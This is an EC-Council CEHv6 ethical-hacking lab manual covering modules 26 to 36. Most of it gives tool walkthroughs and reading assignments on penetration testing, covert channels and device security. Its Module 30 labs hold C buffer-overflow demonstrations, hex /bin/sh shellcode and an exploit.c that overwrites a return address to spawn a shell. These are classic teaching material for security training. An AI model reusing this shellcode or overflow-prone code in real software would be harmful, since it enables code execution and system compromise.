cehv6 lab guide module 20 to module 36 - index-of.es/index-of.es/hacking/lab-guide/cehv6 lab guide...
TRANSCRIPT
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 633 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Module 26
Penetration Testing
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 634 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 26-01
Objective:
Use Azure Web Log to know details about your web traffic
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Install and Launch Azure Web Log
� Start a New Project from Project -> New. Enter the data and click Ok
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 635 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Start a New Log File from File -> Add Log
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 636 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click Hits and Refs
� Click Site Info
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 637 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click Current Month
� Click Previous Month
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 638 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click Year Hits
� Click Hour
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 639 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click System
� Country
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 640 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 26-02
Objective:
Use iInventory to capture hardware & software inventory and registry keys without having to leave your desk.
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Install and launch iInventory
� Click button Audit this PC in the left side pane. To start performance audit
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 641 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Performance Audit Report
� Click Scan Network button on the left side pane.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 642 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click Agent Builder Wizard on the left pane
� Set the options and click Next to forward to the next step
� Click Show Agent Config button on the left side pane
� Select an agent file from the list to display its summary
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 643 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 644 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Summary of agent configuration
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 645 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 26-03
Objective:
Use Link Utility to check links on Web sites and sustaining their efficiency.
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Install and launch Link Utility
� Click New Project button
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 646 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click Import from HTML File. Select a file to import site addresses from. Click Ok
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 647 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click Settings button to change the present options
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 648 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click Scan button. Click Yes
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 649 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 650 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click on the Report to generate the report file
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 651 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 26-04
Objective:
Use MaxCrypt to perform automated computer encryption.
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Install and launch MaxCrypt
� Click on New User to create a New User
� Now Login
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 652 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu
� Click on Manage Volumes
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 653 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click on Create Volume button to create a new volume
� Enter the data and click Create Volume
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 654 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� The New Volume F:\ is created
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 655 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu
� Click on Conceal Files
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 656 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Select a file and click Add button
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 657 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Finally Logout user
Lab 26-05
Objective:
Use Sniffem for monitoring network and capturing data traffic.
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Install and launch Sniffem
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 658 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 659 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Click Settings button to modify the present settings
� Click Capture button to start capturing the activities
� Click Stop button to stop capturing
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 660 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 26-06
Objective:
Use SQL Stripes to monitor and control your SQL Servers.
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Install and Launch SQL Stripes
� Click Yes
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 661 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Select Settings to modify the present options
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 662 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Select Server from the left side pane in the above window and click + symbol button in the right side pane to create a new server
� Enter details and click OK to create a new server
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 663 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Server 1 Created
� Check the Console
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 664 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 26-07
Objective:
Use TraceRoute Program to know the route over the network between two systems, listing of all the intermediate routers connected to its destination.
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Install and launch TraceRoute
� Input URL www.juggyboy.com in the Address bar. Click Trace
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 665 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Trace Result
� Repeat the same for other sites
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 666 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 26-08
Objective:
Use Windows Security Officer to restrict the resources for an application
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Install and Launch Windows Security Officer
� Initially click to change the administrator password
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 667 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Expand System 10 options in the left side pane
� Select Control Panel to modify the options
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 668 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Select Shell Restrictions to modify the options
� Select IE Browser Security to modify the options
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 669 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 670 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Select IE Cookies Viewer to modify the options
� Select Log User Activity to modify the options
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 671 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Select Restrict User Work Time to modify the options
� Select Folder Guard to modify the options
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 672 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 26-09
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Open the Penetration Testing.pdf and read the content Develop a penetration test plan
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 673 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
�
Lab 26-10
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Open the Software Penetration Testing.pdf and read the content Penetration testing today
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 674 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
�
Module 27
Covert Hacking
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 675 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 27-01
� In the CEHv6 Labs CD-ROM, navigate to Module 27
� Open the Covert Channel Analysis and Data Hiding in TCPIP.pdf and read the content Covert Channels
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 676 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 27-02
� In the CEHv6 Labs CD-ROM, navigate to Module 27
� Open the Bypassing Firewall.pdf and read the content Firewall Piercing (Inside-Out Attacks)
� In the same PDF file, read the Examples of Covert Channel Attacks topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 677 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 27-03
� In the CEHv6 Labs CD-ROM, navigate to Module 27
� Open the Covert Actions.pdf and read the content Covert channels are the principle enablers in a DDoS attack
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 678 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
�
Lab 27-04
� In the CEHv6 Labs CD-ROM, navigate to Module 27
� Open the Covert channel vulnerabilities in anonymity systems.pdf and read the content Covert channels
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 679 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Module 30
Exploit Writing
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 680 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 30-01
� In the CEHv6 Labs CD-ROM, navigate to Module 30
� Boot your computer using the BackTrack CD-ROM
� Open command shell and type: kedit example1.c
� Type the following in kedi:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
}
void main() {
function(1,2,3);
}
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 681 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Save the program in kedit.
� Compile the program by typing: $ gcc -S -o example1.s example1.c
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 682 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� View the generated assembly file by typing: kedit example1.s
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 683 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 30-02
example2.c
� In the CEHv6 Labs CD-ROM, navigate to Module 30
� Create another program in kedit.
Kedit example2.c
� Type the following:
void function(char *str) {
char buffer[16];
strcpy(buffer,str);
}
void main() {
char large_string[256];
int i;
for( i = 0; i < 255; i++)
large_string[i] = 'A';
function(large_string);
}
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 684 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Save the program in kedit.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 685 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Compile the program by typing: $ gcc -o example2.s example2.c
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 686 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Run the program by typing: ./example2.s
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 687 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� You should see a segmentation fault error
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 688 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� View the generated assembly file by typing: kedit example2.asm
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 689 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 30-03
Objective:
example3.c
� In the CEHv6 Labs CD-ROM, navigate to Module 30
� Create another program in kedit. Kedit example3.c
� Type the following: void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 690 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Save the program and compile it by typing: $gcc –o example3 example3.c
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 691 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Run the program by typing: $./example3
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 692 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� It should print one
� Disassemble main using gdb
� Type the following: $gdb example3
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 693 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Type: disassemble main
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 694 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 695 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 30-04
Objective:
shellcode.c
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Create another program in kedit
Kedit shellcode.c
Type the following: #include <stdio.h>
void main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 696 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Compile the program by typing: $ gcc -o shellcode -ggdb -static shellcode.c
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 697 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Type: $ gdb shellcode
� Then, type disassemble main.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 698 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Type disassemble _execve
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 699 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 700 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 30-05
Objective:
exit.c
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Create another program in kedit. Kedit exit.c
Type the following: #include <stdlib.h>
void main() {
exit(0);
}
� Compile the program using: $ gcc -o exit -static exit.c
� View the generated code gdb by typing: gdb exit
� Then:
disassemble _exit
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 701 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 30-06
Objective:
testsc.c
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Create another program in kedit.
Kedit testsc.c
� Type the following:
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
� Compile the program using: $ gcc -o testsc testsc.c
� Run the program by typing:
./testsc
� You should see a shell launched.
� Type exit to exit the shell.
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 702 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 30-07
Objective:
exploit.c
� In the CEHv6 Labs CD-ROM, navigate to Module 26
� Create another program in kedit Kedit exploit.c
� Type the following:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
� Compile the program using: $ gcc -o exploit exploit.c
� Run the program by typing:
./exploit
� You should see a shell launched
Type exit to exit the shell
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 703 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Module 34
Mac OS X Hacking
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 704 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 34-01
� In the CEHv6 Labs CD-ROM, navigate to Module 34
� Open the Securing Mac OS X.pdf and read the content
� Read the Security Hardening Guideline topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 705 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the Data Encryption topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 706 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 34-02
� In the CEHv6 Labs CD-ROM, navigate to Module 34
� Open the Security in Mac OS X.pdf and read the content
� Read the Secure Default Settings topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 707 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the Modern Security Architecture topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 708 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Next, read the Strong Authentication topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 709 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 34-03
� In the CEHv6 Labs CD-ROM, navigate to Module 34
� Open the Mac OS X 10.4 Security Checklist.pdf and read the content
� Read the OS X Security Architecture topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 710 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the User Account Security topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 711 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Next, read the Securing System Preferences topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 712 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 34-04
� In the CEHv6 Labs CD-ROM, navigate to Module 34
� Open the Mac OS X Hacking Poses Wide Risk to Windows.pdf and read the content
� Read the Mac OS X Hacking Poses Wide Risk… for Windows topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 713 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Module 35
Hacking Routers, Cable Modems, and Firewalls
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 714 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 35-01
� In the CEHv6 Labs CD-ROM, navigate to Module 35
� Open the Chapter 9-Firewalls.pdf and read the content
� Read the FIREWALL IDENTIFICATION topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 715 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Next, read the PACKET FILTERING topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 716 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 35-02
� In the CEHv6 Labs CD-ROM, navigate to Module 35
� Open the CISCO ROUTERS AS TARGETS.pdf and read the content
� Read the Compromised Router Sniffing topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 717 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the Why we need to protect router resources topic
� Next, read the Router Audit Tool topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 718 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 35-03
� In the CEHv6 Labs CD-ROM, navigate to Module 35
� Open the Cisco Router Security Best Practices.pdf and read the content
� Read the Access management topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 719 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the SNTP Security topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 720 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Next, read the Access control lists topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 721 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 35-04
� In the CEHv6 Labs CD-ROM, navigate to Module 35
� Open the 8 steps to protect your Cisco router.pdf and read the content
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 722 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the Encrypt all passwords topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 723 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Module 36
Hacking Mobile Phones, PDA, and Handheld Devices
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 724 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 36-01
� In the CEHv6 Labs CD-ROM, navigate to Module 36
� Open the Take Control of Your iPhone.pdf and read the content
� Read the QUICK START TO TAKING CONTROL OF AN iPHONE topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 725 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the 8 QUICK TROUBLESHOOTING STEPS topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 726 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� Next, read the AVOID NAVIGATION AND TYPING HASSLES topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 727 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 36-02
� In the CEHv6 Labs CD-ROM, navigate to Module 36
� Open the iphone Hardware Unlock.pdf and read the content
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 728 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 36-03
� In the CEHv6 Labs CD-ROM, navigate to Module 36
� Open the How to Unlock an iPhone.pdf and read the content
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 729 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 36-04
� In the CEHv6 Labs CD-ROM, navigate to Module 36
� Open the The Anatomy of a Hack.pdf and read the content.
� Read the Understanding the Threats to Your Mobile Workforce topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 730 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the Anatomy of a Hack Video Companion Guide topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 731 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 36-05
� In the CEHv6 Labs CD-ROM, navigate to Module 36
� Open the Mobile Handset Security.pdf and read the content
� Read the Security issues on mobile devices topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 732 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
� In the same PDF file, read the Threats and Attacks topic
Ethical Hacking and Countermeasures v6 Lab Manual EC-Council
Page | 733 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.
Lab 36-06
� In the CEHv6 Labs CD-ROM, navigate to Module 36
� Open the Mobile Malware Threats and Prevention.pdf and read the content